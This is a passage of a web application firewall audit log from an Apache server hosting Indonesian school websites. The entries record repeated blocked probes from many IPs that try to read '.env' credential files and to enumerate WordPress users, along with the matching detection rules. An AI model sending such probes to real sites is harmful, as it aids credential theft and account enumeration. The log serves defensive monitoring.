smkn22-jkt.sch.id X-Forwarded-For: 109.199.117.176 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c0185117-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0185117-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748098103813337 2279 (- - -) Stopwatch2: 1748098103813337 2279; combined=1019, p1=364, p2=627, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0185117-Z-- --a8620179-A-- [24/May/2025:21:57:19 +0700] aDHeT_mzt4abyoi_U9kR0gAAAIg 103.236.140.4 34572 103.236.140.4 8181 --a8620179-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36 Accept-Charset: utf-8 --a8620179-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8620179-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748098639744162 822 (- - -) Stopwatch2: 1748098639744162 822; combined=351, p1=312, p2=0, p3=0, p4=0, p5=39, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8620179-Z-- --00795e07-A-- [24/May/2025:22:49:24 +0700] aDHqhOO2UzDOKMmK0i6ynQAAAAA 103.236.140.4 36536 103.236.140.4 8181 --00795e07-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.47.153.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.47.153.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --00795e07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00795e07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748101764774579 3267 (- - -) Stopwatch2: 1748101764774579 3267; combined=1433, p1=480, p2=920, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00795e07-Z-- --430be84f-A-- [25/May/2025:00:02:07 +0700] aDH7jzvI5DIWBJ2mFG5hCAAAANE 103.236.140.4 45894 103.236.140.4 8181 --430be84f-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/80.0.180 Chrome/74.0.3729.180 Safari/537.36 Accept-Charset: utf-8 --430be84f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --430be84f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748106127908472 1011 (- - -) Stopwatch2: 1748106127908472 1011; combined=421, p1=374, p2=0, p3=0, p4=0, p5=46, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --430be84f-Z-- --1077e219-A-- [25/May/2025:00:03:44 +0700] aDH78DvI5DIWBJ2mFG5hIQAAAMc 103.236.140.4 45978 103.236.140.4 8181 --1077e219-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 209.97.180.8 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --1077e219-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1077e219-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748106224360896 831 (- - -) Stopwatch2: 1748106224360896 831; combined=330, p1=293, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1077e219-Z-- --ce24be06-A-- [25/May/2025:00:31:19 +0700] aDICZzvI5DIWBJ2mFG5iHwAAAMw 103.236.140.4 46844 103.236.140.4 8181 --ce24be06-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.22.67.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.22.67.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ce24be06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce24be06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748107879227855 2696 (- - -) Stopwatch2: 1748107879227855 2696; combined=1370, p1=444, p2=890, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce24be06-Z-- --2ef6725e-A-- [25/May/2025:00:35:08 +0700] aDIDTDvI5DIWBJ2mFG5iSwAAAME 103.236.140.4 46980 103.236.140.4 8181 --2ef6725e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.2.52.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.52.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2ef6725e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ef6725e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748108108257432 3277 (- - -) Stopwatch2: 1748108108257432 3277; combined=1484, p1=501, p2=945, p3=0, p4=0, p5=38, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ef6725e-Z-- --679e7242-A-- [25/May/2025:02:27:24 +0700] aDIdnDvI5DIWBJ2mFG5nMQAAANM 103.236.140.4 59872 103.236.140.4 8181 --679e7242-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.212.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.212.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; RMX1851) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --679e7242-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --679e7242-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748114844524463 734 (- - -) Stopwatch2: 1748114844524463 734; combined=310, p1=270, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --679e7242-Z-- --eef63f4f-A-- [25/May/2025:02:33:03 +0700] aDIe7_mzt4abyoi_U9kebwAAAI8 103.236.140.4 60170 103.236.140.4 8181 --eef63f4f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.238.47.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.238.47.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eef63f4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eef63f4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748115183938446 3074 (- - -) Stopwatch2: 1748115183938446 3074; combined=1373, p1=446, p2=896, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eef63f4f-Z-- --d67cd01d-A-- [25/May/2025:02:39:15 +0700] aDIgY_mzt4abyoi_U9kegQAAAIE 103.236.140.4 60444 103.236.140.4 8181 --d67cd01d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 91.108.138.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.108.138.249 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d67cd01d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d67cd01d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748115555127802 3132 (- - -) Stopwatch2: 1748115555127802 3132; combined=1306, p1=474, p2=799, p3=0, p4=0, p5=32, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d67cd01d-Z-- --d9cfb860-A-- [25/May/2025:02:42:28 +0700] aDIhJOO2UzDOKMmK0i66VwAAAAg 103.236.140.4 60550 103.236.140.4 8181 --d9cfb860-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.79.135.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.79.135.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9cfb860-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9cfb860-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748115748351792 3067 (- - -) Stopwatch2: 1748115748351792 3067; combined=1310, p1=473, p2=805, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9cfb860-Z-- --980ee607-A-- [25/May/2025:02:43:30 +0700] aDIhYjvI5DIWBJ2mFG5nWQAAAMM 103.236.140.4 60586 103.236.140.4 8181 --980ee607-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.20.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.20.42 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --980ee607-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --980ee607-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748115810383077 905 (- - -) Stopwatch2: 1748115810383077 905; combined=379, p1=328, p2=0, p3=0, p4=0, p5=51, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --980ee607-Z-- --2175ae5a-A-- [25/May/2025:03:39:23 +0700] aDIue-unkxaVeh4NwhbwAQAAAFI 103.236.140.4 33646 103.236.140.4 8181 --2175ae5a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.221.4.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.221.4.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2175ae5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2175ae5a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748119163162335 7764 (- - -) Stopwatch2: 1748119163162335 7764; combined=6033, p1=1345, p2=4649, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2175ae5a-Z-- --576d6125-A-- [25/May/2025:03:49:07 +0700] aDIww9erygsLmB9N_YQZHAAAAIo 103.236.140.4 34530 103.236.140.4 8181 --576d6125-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.56.220.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.56.220.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --576d6125-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --576d6125-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748119747756830 2615 (- - -) Stopwatch2: 1748119747756830 2615; combined=1360, p1=422, p2=908, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --576d6125-Z-- --748bfc08-A-- [25/May/2025:04:13:03 +0700] aDI2X9erygsLmB9N_YQbAwAAAI0 103.236.140.4 36090 103.236.140.4 8181 --748bfc08-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.248.173.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.248.173.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --748bfc08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --748bfc08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748121183495693 3538 (- - -) Stopwatch2: 1748121183495693 3538; combined=1539, p1=551, p2=951, p3=0, p4=0, p5=37, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --748bfc08-Z-- --0402774b-A-- [25/May/2025:04:19:33 +0700] aDI35derygsLmB9N_YQbSwAAAIo 103.236.140.4 36318 103.236.140.4 8181 --0402774b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Accept-Charset: utf-8 --0402774b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0402774b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748121573878126 841 (- - -) Stopwatch2: 1748121573878126 841; combined=365, p1=320, p2=0, p3=0, p4=0, p5=45, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0402774b-Z-- --32695c0d-A-- [25/May/2025:04:19:38 +0700] aDI36terygsLmB9N_YQbTAAAAJA 103.236.140.4 36320 103.236.140.4 8181 --32695c0d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; BOLT/2.800) AppleWebKit/534.6 (KHTML, like Gecko) Version/5.0 Safari/534.6.3 Accept-Charset: utf-8 --32695c0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32695c0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748121578177474 639 (- - -) Stopwatch2: 1748121578177474 639; combined=248, p1=215, p2=0, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32695c0d-Z-- --f8277a15-A-- [25/May/2025:04:36:19 +0700] aDI709erygsLmB9N_YQbwgAAAJM 103.236.140.4 36924 103.236.140.4 8181 --f8277a15-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.80.184.71 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 45.80.184.71 Accept-Encoding: gzip X-Varnish: 168772844 --f8277a15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f8277a15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748122579341600 770 (- - -) Stopwatch2: 1748122579341600 770; combined=285, p1=249, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8277a15-Z-- --1d19fb55-A-- [25/May/2025:04:46:02 +0700] aDI-GterygsLmB9N_YQcFgAAAJI 103.236.140.4 37392 103.236.140.4 8181 --1d19fb55-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.204.149.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.204.149.18 